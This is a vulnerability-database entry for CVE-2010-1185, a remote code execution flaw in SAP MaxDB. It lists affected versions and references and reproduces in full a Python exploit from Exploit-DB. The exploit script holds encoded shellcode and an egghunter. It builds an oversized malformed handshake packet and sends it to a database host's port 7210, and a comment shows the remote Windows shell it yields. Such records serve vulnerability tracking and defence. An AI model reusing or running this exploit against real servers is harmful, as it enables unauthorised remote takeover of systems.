Details of VAR-E-201003-0333

ID

VAR-E-201003-0333

CVE

cve_id:

CVE-2010-1185

Trust: 1.9

sources: BID: 38769 // EXPLOIT-DB: 11886 // EDBNET: 35520

EDB ID

11886

TITLE

SAP MaxDB - Malformed Handshake Request Remote Code Execution - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 11886

DESCRIPTION

SAP MaxDB - Malformed Handshake Request Remote Code Execution. CVE-2010-1185CVE-63047 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 11886

AFFECTED PRODUCTS

vendor:	sap	model:	maxdb	scope:	-	version:	-	Trust: 1.0
vendor:	sap	model:	maxdb	scope:	eq	version:	7.6.6	Trust: 0.3
vendor:	sap	model:	maxdb build	scope:	eq	version:	7.6.3007	Trust: 0.3
vendor:	sap	model:	maxdb	scope:	eq	version:	7.6.03.15	Trust: 0.3
vendor:	sap	model:	maxdb	scope:	eq	version:	7.6.00.37	Trust: 0.3
vendor:	sap	model:	maxdb	scope:	eq	version:	7.6.0.37	Trust: 0.3
vendor:	sap	model:	maxdb	scope:	eq	version:	7.4.3.32	Trust: 0.3

sources: BID: 38769 // EXPLOIT-DB: 11886

EXPLOIT

#!/usr/bin/python

# Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution
# Date: 2010.03.26
# Author: S2 Crew [Hungary]
# Software link: sap.com<http://sap.com>
# Version: 7.7.06.09
# Tested on: Windows XP SP2 EN
# CVE: ZDI-10-032
# Code:
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\sdb\data\wrk>
#############################################################

import socket
import sys
import os

sc = (
"\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\x74\x24\xf4"
"\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\x42\x02\xff"
"\x35\xbb\xd3\x9f\xbc\x5e\xe2\x8d\xdb\x2b\x57\x01\xaf\x7e\x54"
"\xea\xfd\x6a\xef\x9e\x29\x9c\x58\x14\x0c\x93\x59\x99\x90\x7f"
"\x99\xb8\x6c\x82\xce\x1a\x4c\x4d\x03\x5b\x89\xb0\xec\x09\x42"
"\xbe\x5f\xbd\xe7\x82\x63\xbc\x27\x89\xdc\xc6\x42\x4e\xa8\x7c"
"\x4c\x9f\x01\x0b\x06\x07\x29\x53\xb7\x36\xfe\x80\x8b\x71\x8b"
"\x72\x7f\x80\x5d\x4b\x80\xb2\xa1\x07\xbf\x7a\x2c\x56\x87\xbd"
"\xcf\x2d\xf3\xbd\x72\x35\xc0\xbc\xa8\xb0\xd5\x67\x3a\x62\x3e"
"\x99\xef\xf4\xb5\x95\x44\x73\x91\xb9\x5b\x50\xa9\xc6\xd0\x57"
"\x7e\x4f\xa2\x73\x5a\x0b\x70\x1a\xfb\xf1\xd7\x23\x1b\x5d\x87"
"\x81\x57\x4c\xdc\xb3\x35\x19\x11\x89\xc5\xd9\x3d\x9a\xb6\xeb"
"\xe2\x30\x51\x40\x6a\x9e\xa6\xa7\x41\x66\x38\x56\x6a\x96\x10"
"\x9d\x3e\xc6\x0a\x34\x3f\x8d\xca\xb9\xea\x01\x9b\x15\x45\xe1"
"\x4b\xd6\x35\x89\x81\xd9\x6a\xa9\xa9\x33\x1d\xee\x67\x67\x4d"
"\x98\x85\x97\x63\x04\x03\x71\xe9\xa4\x45\x29\x86\x06\xb2\xe2"
"\x31\x79\x90\x5e\xe9\xed\xac\x88\x2d\x12\x2d\x9f\x1d\xbf\x85"
"\x48\xd6\xd3\x11\x68\xe9\xfe\x31\xe3\xd1\x68\xcb\x9d\x90\x09"
"\xcc\xb7\x43\xaa\x5f\x5c\x94\xa5\x43\xcb\xc3\xe2\xb2\x02\x81"
"\x1e\xec\xbc\xb4\xe3\x68\x86\x7d\x3f\x49\x09\x7f\xb2\xf5\x2d"
"\x6f\x0a\xf5\x69\xdb\xc2\xa0\x27\xb5\xa4\x1a\x86\x6f\x7e\xf0"
"\x40\xf8\x07\x3a\x53\x7e\x08\x17\x25\x9e\xb8\xce\x70\xa0\x74"
"\x87\x74\xd9\x69\x37\x7a\x30\x2a\x47\x31\x19\x1a\xc0\x9c\xcb"
"\x1f\x8d\x1e\x26\x63\xa8\x9c\xc3\x1b\x4f\xbc\xa1\x1e\x0b\x7a"
"\x59\x52\x04\xef\x5d\xc1\x25\x3a\x57")

egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

host = "172.16.29.133"
port = 7210

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

ret = "\x08\xf1\xa0\x00" # HC

packet = (
"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00"
"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
"\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x07\x49" + "A"*5000 + "T00WT00W" + sc + "\x41" * 2500 + egghunter + "\x90"*2500)

s.send(packet)
s.close()

Trust: 1.0

sources: EXPLOIT-DB: 11886

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 11886

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 11886

TYPE

Malformed Handshake Request Remote Code Execution

Trust: 1.0

sources: EXPLOIT-DB: 11886

CREDITS

S2 Crew

Trust: 0.6

sources: EXPLOIT-DB: 11886

EXTERNAL IDS

db:	NVD	id:	CVE-2010-1185	Trust: 1.9
db:	EXPLOIT-DB	id:	11886	Trust: 1.6
db:	ZDI	id:	ZDI-10-032	Trust: 0.9
db:	EDBNET	id:	66821	Trust: 0.6
db:	EDBNET	id:	35520	Trust: 0.6
db:	BID	id:	38769	Trust: 0.3

sources: BID: 38769 // EXPLOIT-DB: 11886 // EDBNET: 66821 // EDBNET: 35520

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2010-1185	Trust: 1.6
url:	https://www.intelligentexploit.com	Trust: 0.6
url:	https://www.exploit-db.com/exploits/11886/	Trust: 0.6
url:	http://www.zerodayinitiative.com/advisories/zdi-10-032/	Trust: 0.3
url:	https://www.sdn.sap.com/irj/sdn/maxdb	Trust: 0.3

sources: BID: 38769 // EXPLOIT-DB: 11886 // EDBNET: 66821 // EDBNET: 35520

SOURCES

db:	BID	id:	38769
db:	EXPLOIT-DB	id:	11886
db:	EDBNET	id:	66821
db:	EDBNET	id:	35520

LAST UPDATE DATE

2022-07-27T09:52:41.427000+00:00

SOURCES UPDATE DATE

db:

BID

id:

38769

date:

2010-05-10T12:32:00

SOURCES RELEASE DATE

db:	BID	id:	38769	date:	2010-03-16T00:00:00
db:	EXPLOIT-DB	id:	11886	date:	2010-03-26T00:00:00
db:	EDBNET	id:	66821	date:	2010-04-03T00:00:00
db:	EDBNET	id:	35520	date:	2010-03-26T00:00:00